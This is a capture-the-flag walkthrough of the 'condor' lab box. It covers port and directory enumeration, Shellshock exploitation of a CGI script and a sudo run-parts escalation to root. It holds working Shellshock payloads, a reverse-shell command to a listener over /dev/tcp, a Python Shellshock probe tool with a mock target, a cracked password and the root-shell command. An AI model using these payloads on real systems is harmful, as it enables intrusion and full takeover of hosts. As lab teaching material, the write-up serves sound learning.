root💀muzec-sec:~#

Hack. Sleep. Repeat


Enumeration With Nmap

We always start with an nmap scan: all TCP ports, default scripts and version detection, output saved in every format.

nmap -sC -sV -p- -oA nmap -vv <Target-IP>

# Nmap 7.91 scan initiated Mon Nov 15 09:37:32 2021 as: nmap -sC -sV -p- -oA nmap -vv 172.16.109.159
Nmap scan report for 172.16.109.159
Host is up, received syn-ack (0.00023s latency).
Scanned at 2021-11-15 09:37:33 WAT for 8s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 39:41:db:3a:f0:8f:7d:4d:85:c5:aa:0b:5f:66:ba:a7 (RSA)
| ssh-rsa
|   256 66:89:b1:8e:8b:af:cf:7f:49:c5:7c:e6:4b:b7:d8:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC4vXcAX0FuhBEcZk2KA5njtMpDJSpWAsddCggiHljbJ3/IjV5dkVX1cnBkMv9uB5dTaV+Qe0qVJPGCermYxHbw=
|   256 a3:b3:f0:14:a4:4e:05:c0:d1:24:2f:a8:fe:a5:2c:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINY9x5z6Jg3VUD13RTFE507JApanRMhT9wbDvDSWQN92
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 15 09:37:42 2021 -- 1 IP address (1 host up) scanned in 9.43 seconds

PORTS

22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))

Only two open ports, SSH and HTTP. Nothing to brute-force on SSH yet, so the web server is the obvious place to start digging.

Enumeration On Port 80 HTTP

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ dirb http://172.16.109.159/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 15 09:44:26 2021
URL_BASE: http://172.16.109.159/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.109.159/ ----
+ http://172.16.109.159/cgi-bin/ (CODE:403|SIZE:279)                                                                                                                  
+ http://172.16.109.159/index.php (CODE:200|SIZE:183)                                                                                                                 
+ http://172.16.109.159/server-status (CODE:403|SIZE:279)                                                                                                             
                                                                                                                                                                      
-----------------
END_TIME: Mon Nov 15 09:44:28 2021
DOWNLOADED: 4612 - FOUND: 3

A quick dirb run with the common wordlist only turns up index.php and the default cgi-bin directory, which answers 403. Opening index.php in the browser shows nothing useful, and the page source holds no hints either, so the next step is to brute-force inside /cgi-bin with a larger wordlist and extensions that include cgi and sh.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ gobuster dir -u http://172.16.109.159/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,phtml,html,txt,old,jpg,cgi,sh
===============================================================
Gobuster v3.1.0                                                                    
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.109.159/cgi-bin
[+] Method:                  GET                                                   
[+] Threads:                 10                                                    
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes:   404                                                   
[+] User Agent:              gobuster/3.1.0    
[+] Extensions:              html,txt,old,jpg,cgi,sh,php,phtml
[+] Timeout:                 10s                                                   
===============================================================
2021/11/15 09:49:43 Starting gobuster in directory enumeration mode
===============================================================

/test.cgi (Status: 200) [Size: 20]
/condor.sh (Status: 200) [Size: 137]

Two scripts under /cgi-bin answering 200 is exactly the setup for Shellshock (CVE-2014-6271): Apache's mod_cgi hands every request header to the script as an HTTP_* environment variable, and a bash-based CGI script on an unpatched bash evaluates a header value that starts with a function definition. Time to test both with the usual marker probe.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://172.16.109.159/cgi-bin/test.cgi 2>/dev/null| grep 'VULNERABLE'

test.cgi does not echo the marker back, so either it is not run by bash or the output never makes it to us. One caveat with this probe: the marker is printed before any CGI header, and Apache answers a malformed header block with a 500 instead of the script output, so a negative here is not fully conclusive. Either way, condor.sh is left, and the .sh extension makes it the more likely candidate.
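To make the probe logic concrete, here is an added example (my code, not part of the original writeup or of the box) that sends the function-definition prefix through several headers, the way the two curl commands on this page do, and checks for a marker in the response. It runs against a local mock of an Apache CGI directory, constructed for the example, where condor.sh behaves like a bash script on an unpatched bash and test.cgi never reaches bash; the mock also applies Apache's rule that script output must begin with a header line or a blank line, which is why the robust variant of the probe sends an `echo;` first. Port, paths and the marker string are assumptions.

```python
"""Shellshock (CVE-2014-6271) CGI probe against a local mock Apache/CGI target.

Added example, not code from the original writeup. A CGI gateway exports every
request header to the script as an HTTP_<NAME> environment variable; a
vulnerable bash evaluates a value of the form '() { :; }; <cmd>' as a function
definition and then runs <cmd> before the script body starts. The mock target
below is constructed for the example (paths, port and marker are assumptions).
"""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MARKER = "SHELLSHOCK-MARKER-7d4f"
PROBE_HEADERS = ("User-Agent", "Cookie", "Referer")  # each becomes HTTP_* for the CGI

NAIVE_PROBE = f'echo "{MARKER}"'          # marker first: breaks the CGI header block
ROBUST_PROBE = f'echo; echo "{MARKER}"'   # blank line first ends the (empty) header block


def shellshock_payload(command: str) -> str:
    """Header value a vulnerable bash parses as a function definition plus a trailing command."""
    return "() { :; }; " + command


def _fake_bash(trailing):
    """Mock of the injected command running: understands only chains of 'echo [text]'."""
    lines = []
    for cmd in trailing.split(";"):
        cmd = cmd.strip()
        if cmd == "echo":
            lines.append("")
        elif cmd.startswith("echo "):
            lines.append(cmd[5:].strip().strip('"'))
    return lines


class MockCGIHandler(BaseHTTPRequestHandler):
    """Constructed mock target: condor.sh is 'bash' and vulnerable, test.cgi is not."""

    def do_GET(self):
        output = []
        if self.path == "/cgi-bin/condor.sh":
            for name in PROBE_HEADERS:
                value = self.headers.get(name, "")
                if value.startswith("() {") and "};" in value:
                    output += _fake_bash(value.split("};", 1)[1])  # runs before the script body
        output += ["Content-Type: text/plain", "", "hello from cgi"]  # the script's own output
        # Apache rule: first output line must be a header or blank, else 500 "malformed header".
        first = output[0]
        if first != "" and ":" not in first:
            self._reply(500, b"Internal Server Error\n")
            return
        body_start = output.index("")  # blank line terminates the header block
        self._reply(200, "\n".join(output[body_start + 1:]).encode() + b"\n")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def probe(base_url, path, command, timeout=3.0):
    """Return {header: marker_seen} for one CGI path and one injected command."""
    results = {}
    for header in PROBE_HEADERS:
        req = urllib.request.Request(base_url + path, headers={header: shellshock_payload(command)})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # a 500 still carries a body worth reading
            body = err.read().decode(errors="replace")
        results[header] = MARKER in body
    return results


def start_mock_server():
    srv = HTTPServer(("127.0.0.1", 0), MockCGIHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def run_probes():
    """Probe both mock scripts with the naive and the robust marker command."""
    srv, base = start_mock_server()
    try:
        return {
            (path, label): probe(base, path, command)
            for path in ("/cgi-bin/test.cgi", "/cgi-bin/condor.sh")
            for label, command in (("naive", NAIVE_PROBE), ("robust", ROBUST_PROBE))
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for (path, label), hits in run_probes().items():
        seen = [h for h, ok in hits.items() if ok]
        print(f"{path} [{label}]: " + (f"VULNERABLE via {', '.join(seen)}" if seen else "no marker"))
```

Run it directly to see both scripts probed with the marker-first command and the blank-line-first variant; only the latter reports condor.sh. Against a real target, call probe() with the base URL and the same two commands, and treat a 500 on the naive probe as a reason to retry with the robust one rather than as a clean negative.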


curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/172.16.109.1/1337 0>&1' http://172.16.109.159/cgi-bin/condor.sh

With an ncat listener waiting on 172.16.109.1:1337, fire the payload through the Cookie header this time: condor.sh runs it and the reverse shell lands on the listener. First order of business is upgrading it to a proper TTY.


With a stable shell, the next step is local enumeration to find a way to another user.

That turns up a file worth a closer look; let's cat it and see what it holds.

It holds password hashes, sha512crypt by the $6$ prefix. Let's feed them to John the Ripper with rockyou to see whether any are crackable or whether this is a rabbit hole.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 29 password hashes with 29 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Remaining 27 password hashes with 27 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

John cracks two of the hashes. Let's try both sets of credentials.

Shell As Paulo

The credentials paulo / password123 work, giving a shell as paulo.

Privilege Escalation

Time to get root. sudo -l shows paulo can run one command as root without a password:

User paulo may run the following commands on condor:
    (ALL : ALL) NOPASSWD: /usr/bin/run-parts

A quick look at GTFOBins gives the run-parts sudo entry:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo run-parts --new-session --regex '^sh$' /bin

run-parts executes every executable in /bin whose name matches ^sh$, i.e. /bin/sh, and since sudo runs it as root we land in a root shell. Done.
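As an added example (mine, not code from the writeup or from debianutils), here is a small Python re-implementation of run-parts' file selection so the effect of `--regex '^sh$'` is visible. It goes slightly beyond the page by also showing the default naming rule, under which files with a dot in their name such as condor.sh are skipped, and by mirroring `--new-session` with a fresh process session for each child. The sample directory is built by build_sample_dir() as a stand-in for /bin; the interpreter path and the file names are assumptions.

```python
"""What `sudo run-parts --new-session --regex '^sh$' /bin` actually selects.

Added example, not code from the writeup or from debianutils. run-parts walks a
directory in lexical order and executes every regular, executable file whose
name matches a pattern: by default ^[a-zA-Z0-9_-]+$, or whatever --regex gives.
Each file runs as the calling user, which under sudo is root, so '^sh$' on /bin
runs exactly /bin/sh and hands over a root shell. The sample directory below is
constructed for the example; interpreter path and file names are assumptions.
"""
import os
import re
import stat
import subprocess
import tempfile

DEFAULT_NAME_RULE = r"^[a-zA-Z0-9_-]+$"  # run-parts' default acceptable file name


def select_parts(directory, regex=None):
    """Return the sorted names run-parts would execute in `directory`."""
    pattern = re.compile(regex or DEFAULT_NAME_RULE)
    chosen = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):          # directories, sockets etc. are skipped
            continue
        if not os.access(path, os.X_OK):      # run-parts ignores non-executables
            continue
        if pattern.search(name):
            chosen.append(name)
    return chosen


def run_parts(directory, regex=None, new_session=False):
    """Execute the selected files in order and collect {name: stdout}.

    new_session mirrors --new-session: each child gets its own session (setsid),
    so killing the run-parts parent does not take the spawned shell with it.
    """
    outputs = {}
    for name in select_parts(directory, regex):
        proc = subprocess.run([os.path.join(directory, name)], capture_output=True,
                              text=True, start_new_session=new_session)
        outputs[name] = proc.stdout
    return outputs


def build_sample_dir():
    """Constructed stand-in for /bin: executables with and without dots in the name."""
    directory = tempfile.mkdtemp(prefix="runparts-")
    scripts = {
        "sh": "echo uid=$(id -u) shell\n",   # the one '^sh$' is meant to hit
        "sha256sum": "echo sha256sum ran\n",  # also matches '^sh' without the $ anchor
        "ls": "echo ls ran\n",                # matches the default rule only
        "condor.sh": "echo condor.sh ran\n",  # dot in the name: skipped by the default rule
        "backup.old": "echo backup.old ran\n",
    }
    for name, body in scripts.items():
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n" + body)
        os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    with open(os.path.join(directory, "notes"), "w") as fh:  # no executable bit: skipped
        fh.write("not a script\n")
    return directory


if __name__ == "__main__":
    sample = build_sample_dir()
    print("default rule :", select_parts(sample))
    print("--regex ^sh  :", select_parts(sample, r"^sh"))
    print("--regex ^sh$ :", select_parts(sample, r"^sh$"))
    for name, out in run_parts(sample, r"^sh$", new_session=True).items():
        print(f"{name}: {out.strip()}")
```

The anchored pattern matters: `^sh` alone would also pick up sha256sum, shasum and friends, and run-parts would execute each of them in turn before (or instead of) dropping you into the shell, so keep the `$`.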

Helpful Resources

https://book.hacktricks.xyz/pentesting/pentesting-web/cgi

https://gtfobins.github.io/gtfobins/run-parts/#sudo

Greeting From Muzec


